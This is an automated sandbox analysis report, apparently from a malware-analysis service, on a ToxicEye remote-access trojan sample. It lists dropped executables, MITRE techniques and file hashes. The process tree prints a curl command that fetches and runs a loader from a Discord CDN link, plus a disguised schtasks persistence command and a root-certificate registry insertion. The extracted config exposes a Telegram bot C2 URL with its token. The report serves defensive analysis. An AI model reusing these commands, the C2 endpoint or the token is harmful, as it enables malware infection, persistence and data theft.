toxiceye | 52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6

Analysis

max time kernel
147s
max time network
148s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
18-01-2024 01:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe
Size

14.6MB
MD5

cef5534159555f0df0b6e85715c19208
SHA1

b1d4a0ccf69b20ba3114696e6d7c126089080325
SHA256

52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6
SHA512

2c3e75871fd59db084747c078fa92050cb5ee3a47a307730f57cada79ae5ba00e037ffe8508e834eb4630d8f8cf1e8b5d50b88ae7027f66f55033ac92a511460
SSDEEP

393216:+SL+9qz88Ck+7q3p91JmBqfKV6egI7w13CT6Ztw6:+++9q4G331UofXeRw13CT6

Score

10^/10

toxiceye rat trojan upx

Malware Config

Extracted

Family

toxiceye

https://api.telegram.org/bot6782288559:AAGGaNp1iJda_iae5clmNAjmS8bZxRP8kMY/sendMessage?chat_id=6117387875

Signatures

ToxicEye
ToxicEye is a trojan written in C#.
rat trojan toxiceye

Executes dropped EXE 8 IoCs

Processes:

DRIVER.EXEPROTECTION.EXESUBZERO.EXESUBZEROFN UPDATED SPOOFER.EXEPROTECTION.EXEWindowsInput.exeMicrosoft Windows Defender.exePERMENANTSPOOFER.exe

pid	process
2056	DRIVER.EXE
2200	PROTECTION.EXE
2880	SUBZERO.EXE
2964	SUBZEROFN UPDATED SPOOFER.EXE
2752	PROTECTION.EXE
1648	WindowsInput.exe
2760	Microsoft Windows Defender.exe
1916	PERMENANTSPOOFER.exe

Loads dropped DLL 17 IoCs

Processes:

52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exePROTECTION.EXEPROTECTION.EXESUBZEROFN UPDATED SPOOFER.EXE

pid	process
1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe
1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe
1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe
2728
1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe
2200	PROTECTION.EXE
2752	PROTECTION.EXE
2752	PROTECTION.EXE
2752	PROTECTION.EXE
2752	PROTECTION.EXE
2752	PROTECTION.EXE
2752	PROTECTION.EXE
2752	PROTECTION.EXE
2964	SUBZEROFN UPDATED SPOOFER.EXE
2964	SUBZEROFN UPDATED SPOOFER.EXE
1204
1204

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\_MEI22002\python312.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI22002\python312.dll	upx
behavioral1/memory/2752-111-0x000007FEEF960000-0x000007FEF0038000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

2 wtfismyip.com
4 wtfismyip.com

flow	ioc
2	wtfismyip.com
4	wtfismyip.com

Drops file in System32 directory 3 IoCs

Processes:

WindowsInput.exeSUBZEROFN UPDATED SPOOFER.EXE

description	ioc	process
File created	C:\Windows\SysWOW64\WindowsInput.InstallState	WindowsInput.exe
File created	C:\Windows\SysWOW64\WindowsInput.exe	SUBZEROFN UPDATED SPOOFER.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsInput.InstallLog	WindowsInput.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

852 schtasks.exe
2016 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

472 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

2624 tasklist.exe

pid	process
852	schtasks.exe
2016	schtasks.exe

pid	process
472	timeout.exe

pid	process
2624	tasklist.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

SUBZERO.EXE

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	SUBZERO.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	SUBZERO.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

PERMENANTSPOOFER.exe

pid process

1916 PERMENANTSPOOFER.exe

pid	process
1916	PERMENANTSPOOFER.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

Processes:

Microsoft Windows Defender.exePERMENANTSPOOFER.exe

pid	process
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
1916	PERMENANTSPOOFER.exe
1916	PERMENANTSPOOFER.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe
2760	Microsoft Windows Defender.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Microsoft Windows Defender.exe

pid process

2760 Microsoft Windows Defender.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

DRIVER.EXEtasklist.exeMicrosoft Windows Defender.exePERMENANTSPOOFER.exe

description	pid	process
Token: SeDebugPrivilege	2056	DRIVER.EXE
Token: SeDebugPrivilege	2624	tasklist.exe
Token: SeDebugPrivilege	2760	Microsoft Windows Defender.exe
Token: SeDebugPrivilege	1916	PERMENANTSPOOFER.exe
Token: SeDebugPrivilege	1916	PERMENANTSPOOFER.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Microsoft Windows Defender.exePERMENANTSPOOFER.exe

pid process

2760 Microsoft Windows Defender.exe
1916 PERMENANTSPOOFER.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exePROTECTION.EXESUBZEROFN UPDATED SPOOFER.EXEDRIVER.EXEcmd.exePERMENANTSPOOFER.exeSUBZERO.EXEcmd.exe

description	pid	process	target process
PID 1684 wrote to memory of 2056	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	DRIVER.EXE
PID 1684 wrote to memory of 2056	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	DRIVER.EXE
PID 1684 wrote to memory of 2056	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	DRIVER.EXE
PID 1684 wrote to memory of 2056	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	DRIVER.EXE
PID 1684 wrote to memory of 2200	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	PROTECTION.EXE
PID 1684 wrote to memory of 2200	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	PROTECTION.EXE
PID 1684 wrote to memory of 2200	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	PROTECTION.EXE
PID 1684 wrote to memory of 2200	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	PROTECTION.EXE
PID 1684 wrote to memory of 2880	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	SUBZERO.EXE
PID 1684 wrote to memory of 2880	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	SUBZERO.EXE
PID 1684 wrote to memory of 2880	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	SUBZERO.EXE
PID 1684 wrote to memory of 2880	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	SUBZERO.EXE
PID 1684 wrote to memory of 2964	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 1684 wrote to memory of 2964	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 1684 wrote to memory of 2964	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 1684 wrote to memory of 2964	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 1684 wrote to memory of 2964	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 1684 wrote to memory of 2964	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 1684 wrote to memory of 2964	1684	52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 2200 wrote to memory of 2752	2200	PROTECTION.EXE	PROTECTION.EXE
PID 2200 wrote to memory of 2752	2200	PROTECTION.EXE	PROTECTION.EXE
PID 2200 wrote to memory of 2752	2200	PROTECTION.EXE	PROTECTION.EXE
PID 2964 wrote to memory of 1648	2964	SUBZEROFN UPDATED SPOOFER.EXE	WindowsInput.exe
PID 2964 wrote to memory of 1648	2964	SUBZEROFN UPDATED SPOOFER.EXE	WindowsInput.exe
PID 2964 wrote to memory of 1648	2964	SUBZEROFN UPDATED SPOOFER.EXE	WindowsInput.exe
PID 2964 wrote to memory of 1648	2964	SUBZEROFN UPDATED SPOOFER.EXE	WindowsInput.exe
PID 2056 wrote to memory of 852	2056	DRIVER.EXE	schtasks.exe
PID 2056 wrote to memory of 852	2056	DRIVER.EXE	schtasks.exe
PID 2056 wrote to memory of 852	2056	DRIVER.EXE	schtasks.exe
PID 2056 wrote to memory of 2248	2056	DRIVER.EXE	cmd.exe
PID 2056 wrote to memory of 2248	2056	DRIVER.EXE	cmd.exe
PID 2056 wrote to memory of 2248	2056	DRIVER.EXE	cmd.exe
PID 2248 wrote to memory of 2624	2248	cmd.exe	tasklist.exe
PID 2248 wrote to memory of 2624	2248	cmd.exe	tasklist.exe
PID 2248 wrote to memory of 2624	2248	cmd.exe	tasklist.exe
PID 2248 wrote to memory of 2440	2248	cmd.exe	find.exe
PID 2248 wrote to memory of 2440	2248	cmd.exe	find.exe
PID 2248 wrote to memory of 2440	2248	cmd.exe	find.exe
PID 2248 wrote to memory of 472	2248	cmd.exe	timeout.exe
PID 2248 wrote to memory of 472	2248	cmd.exe	timeout.exe
PID 2248 wrote to memory of 472	2248	cmd.exe	timeout.exe
PID 2964 wrote to memory of 2760	2964	SUBZEROFN UPDATED SPOOFER.EXE	Microsoft Windows Defender.exe
PID 2964 wrote to memory of 2760	2964	SUBZEROFN UPDATED SPOOFER.EXE	Microsoft Windows Defender.exe
PID 2964 wrote to memory of 2760	2964	SUBZEROFN UPDATED SPOOFER.EXE	Microsoft Windows Defender.exe
PID 2964 wrote to memory of 2760	2964	SUBZEROFN UPDATED SPOOFER.EXE	Microsoft Windows Defender.exe
PID 2248 wrote to memory of 1916	2248	cmd.exe	PERMENANTSPOOFER.exe
PID 2248 wrote to memory of 1916	2248	cmd.exe	PERMENANTSPOOFER.exe
PID 2248 wrote to memory of 1916	2248	cmd.exe	PERMENANTSPOOFER.exe
PID 1916 wrote to memory of 2016	1916	PERMENANTSPOOFER.exe	schtasks.exe
PID 1916 wrote to memory of 2016	1916	PERMENANTSPOOFER.exe	schtasks.exe
PID 1916 wrote to memory of 2016	1916	PERMENANTSPOOFER.exe	schtasks.exe
PID 1916 wrote to memory of 608	1916	PERMENANTSPOOFER.exe	WerFault.exe
PID 1916 wrote to memory of 608	1916	PERMENANTSPOOFER.exe	WerFault.exe
PID 1916 wrote to memory of 608	1916	PERMENANTSPOOFER.exe	WerFault.exe
PID 2880 wrote to memory of 2296	2880	SUBZERO.EXE	cmd.exe
PID 2880 wrote to memory of 2296	2880	SUBZERO.EXE	cmd.exe
PID 2880 wrote to memory of 2296	2880	SUBZERO.EXE	cmd.exe
PID 2296 wrote to memory of 2264	2296	cmd.exe	certutil.exe
PID 2296 wrote to memory of 2264	2296	cmd.exe	certutil.exe
PID 2296 wrote to memory of 2264	2296	cmd.exe	certutil.exe
PID 2296 wrote to memory of 1612	2296	cmd.exe	find.exe
PID 2296 wrote to memory of 1612	2296	cmd.exe	find.exe
PID 2296 wrote to memory of 1612	2296	cmd.exe	find.exe
PID 2296 wrote to memory of 1616	2296	cmd.exe	find.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe
"C:\Users\Admin\AppData\Local\Temp\52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1684
- C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE
  "C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2056
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Microsoft OneDrive Defender" /tr "C:\Users\SubZ\PERMENANTSPOOFER.exe"
    3⤵
    - Creates scheduled task(s)
    PID:852
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp20E9.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp20E9.tmp.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2248
  - - C:\Users\SubZ\PERMENANTSPOOFER.exe
      "PERMENANTSPOOFER.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1916
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Microsoft OneDrive Defender" /tr "C:\Users\SubZ\PERMENANTSPOOFER.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2016
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1916 -s 1424
        5⤵
        
        PID:608
- C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE
  "C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2200
- - C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE
    "C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2752
- C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE
  "C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE" MD5 | find /i /v "md5" | find /i /v "certutil"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2296
  - - C:\Windows\system32\find.exe
      find /i /v "certutil"
      4⤵
      PID:1616
  - - C:\Windows\system32\find.exe
      find /i /v "md5"
      4⤵
      PID:1612
  - - C:\Windows\system32\certutil.exe
      certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE" MD5
      4⤵
      PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1196977210687488151/1197232221279485992/loader.exe -o NewVersion.exe --silent
    3⤵
    PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c NewVersion.exe
    3⤵
    PID:2376
- C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE
  "C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2964
- - C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2760
- - C:\Windows\SysWOW64\WindowsInput.exe
    "C:\Windows\SysWOW64\WindowsInput.exe" --install
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    PID:1648

C:\Windows\system32\find.exe
find ":"
1⤵
PID:2440

C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2056"
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2624

C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
1⤵
- Delays execution with timeout.exe
PID:472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
181KB

MD5
e5a5b93a753960a93abee53ea27d594c

SHA1
cbd583d7ab69074db569b46136828d698bd41a3a

SHA256
886c08f448a5fcb27e9626b9d6efa0fdef1c3d7dbe7e9e0d7fcfa39fdb6637dd

SHA512
8374200ceaa534f1fe8061f5f54afeac646300393e1ee9ae2a309621d3de3b22b1ef17d561bce4f96fcc9c059deabbf1db164b8a2c43084a77dc3c2f88ea6759

Download Submit
C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
28KB

MD5
85649e5ee9c7b64a20c4feb4bae2d6f8

SHA1
7377cc11931d35a5891b0dada6ae3231016c2c2b

SHA256
43cb35b4235f75034d3aa37e101919970c7caa4487ab4161a0c93dcdecb40151

SHA512
3050cf7ff616628894ff0a65fa285eabc7585e303945ee1d5b041c8a4d9da14ba40a833858cbbe8f847a830d9ab9bdc27a0342ff1776ee9b3b6ffb0a3310df3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
109KB

MD5
a234ee7154ebb81ddd9f16e69f346fb7

SHA1
98b8384b8c499af5ec89903b04e0b43d4238ba81

SHA256
e39f17b345a5a323d6468e1292243e89622bc944cada7a751970cdb1535e6250

SHA512
82543549d99672c7b463387e067593722d46a7168fc628446125abe6a659662c917ed753a68e15242e2e71a036c6f65e0b5261b0b05e9a96b26f87b819c2f9eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE

Filesize
80KB

MD5
4c3ab4b8c981fbef2aeb63008151a384

SHA1
0fb90022a643a4ee113af5e030fb5676857292d6

SHA256
477f8c264eba1de242b134281b7cfcaf2e5488de7e8289a31fdbdce0983508ef

SHA512
a63429a0e3631175ebf6314079c4ebf26ef3cdc7c77bec0a3a7d13bd15ef3b1d3dbd570c566e75ee8af3b4ed67421fcda87d0986a68aa925875e63268e50ba92

Download Submit
C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE

Filesize
228KB

MD5
c0ce61f8945f583202ebcc402d6d64eb

SHA1
41f53f513183844fc3eac467e133f120fe16aef1

SHA256
c676f3116c1d647cee88eeed9588d31ec931a014c6b8fd99c225f311341ab93d

SHA512
6d821e53a4f6c4b1063cdbedd400c4173c894b1e113d1f25c04f94a810da35d75c300e13060260353c5d8439cf156fb2fba3e9f97a261aeba739a118d008f2d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE

Filesize
146KB

MD5
d908cf1f4097e146f15694476de33aef

SHA1
af4690c7b06486afe9b101184e8a2dea14335ed7

SHA256
c24e13b84a2be48bcffe793f5844192ff8334fa9e844cb348090ca7bb4ef24a5

SHA512
60eb10d304432ce1c9328aca144092e5f3ccabbe4ef721b9f72b96da3aa28c0612b913bac8b821d77b4985548330b79d271f015c8fd4595c5869195e0548f29e

Download Submit
C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE

Filesize
153KB

MD5
5524053ac84c01a0c0a39152f96731e5

SHA1
7001720cb7e2baaf6a41e09cbdb7aebaf0187805

SHA256
1c4da6ce98365a91122ed563d3e88646abcf72d86d887bc92cdb88380406a229

SHA512
507fcc49c312f48180f08e4e38a21353bca96e88e34e98056c1dd2e9da52476db7e924212c73b694954e85d3ec76f5d2a029fa1cb0bf85d6044bf904d6a52eea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI22002\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
4380d56a3b83ca19ea269747c9b8302b

SHA1
0c4427f6f0f367d180d37fc10ecbe6534ef6469c

SHA256
a79c7f86462d8ab8a7b73a3f9e469514f57f9fe456326be3727352b092b6b14a

SHA512
1c29c335c55f5f896526c8ee0f7160211fd457c1f1b98915bcc141112f8a730e1a92391ab96688cbb7287e81e6814cc86e3b057e0a6129cbb02892108bfafaf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI22002\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
2554060f26e548a089cab427990aacdf

SHA1
8cc7a44a16d6b0a6b7ed444e68990ff296d712fe

SHA256
5ab003e899270b04abc7f67be953eaccf980d5bbe80904c47f9aaf5d401bb044

SHA512
fd4d5a7fe4da77b0222b040dc38e53f48f7a3379f69e2199639b9f330b2e55939d89ce8361d2135182b607ad75e58ee8e34b90225143927b15dcc116b994c506

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI22002\python312.dll

Filesize
89KB

MD5
7ad2863749bd506cbb2285c933991ed9

SHA1
9a47fffb0d77c8cfeb972fd14452ecb03446b7bb

SHA256
6c9d074756a98729440bc8f2d722ac4a7b23d6fc8a5d207906f26055d5c80f5b

SHA512
eafdd2bb0dd9679ae2aa601c7997fd79245a5e34303bc2456e957170dc6288d6c6da4f954566809f503e066bf8442881d187ba2a57c97ce6819eef1f3ff4957b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI22002\ucrtbase.dll

Filesize
78KB

MD5
41a047efe0451940b95db8d31fe527b9

SHA1
3e53f7978fe3cd57f7091972c78ee46a4906d9e6

SHA256
e20c6ce4b3a4a6aa9bbacd95acfc09cfd7d5e41faf5810123768839a8e7caf3c

SHA512
99ae8a28eefe8f235024611029777aa50d94718aa6a89adc1691b87b3734407e330068f1dd2154eafd0d398c1fc81e0aa8b1221135fce05d2faaf5cc35976e91

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp20E9.tmp.bat

Filesize
192B

MD5
584591711cdf59b381d605be34fce2fb

SHA1
e2e85e505eaa04052c5a864d9b31e4c788419841

SHA256
4e8cc6e83a9ec828e20c4c55f11a4e8cf3cd1e08e8df2eb3c72e8892ef836c83

SHA512
55e794671d83fd7d50410d3a288a03964b3f04485b7ed50a7ace0b2d308b4032e566a401f32737e2e69a95625d8dd8786726b75a8647345767e0cf14510840bd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe

Filesize
77KB

MD5
765808adc048ea7a891bf71d73d9b3bb

SHA1
c4e2a94816edceb365da088aa5c30b112021550d

SHA256
fedca191727b023176c088537731a003d4fda6c5e38d5cf4760d0c578d09b1a2

SHA512
bec891d7a794518b2452c665a88cbf1627feaf0dac97a6385010e1bdbf40fd727bd301e9713f4e436bee5eb7d71cfecf65016aebef4c8d41b6730263cbb562e8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe

Filesize
120KB

MD5
8af7f489539a93f557ebdd5434c02a6b

SHA1
41770c775c7ce85f2e6787ad55d064e23d20986d

SHA256
ae406cb2ae5a4946f6b95d3a5ac3f86f343a63c54f5410138a529ee5eb097616

SHA512
0a07d0cf94bda2334f76b0b345229209519dd4da004f012005d5a3d8272b4373c6cbf1061d4fdf8e6cc26130fa8ee7d7073a742a77d2fa17dd5c5063f060f8b7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe

Filesize
174KB

MD5
acd304edd8a12657d85c63de1fb7ab50

SHA1
9fa885f71bdbd10765140f664244d59e9281027c

SHA256
c48b0f77cbd408ae3e167bb2945e9fb44d47502acab7c8f1a05effc2dd4d643c

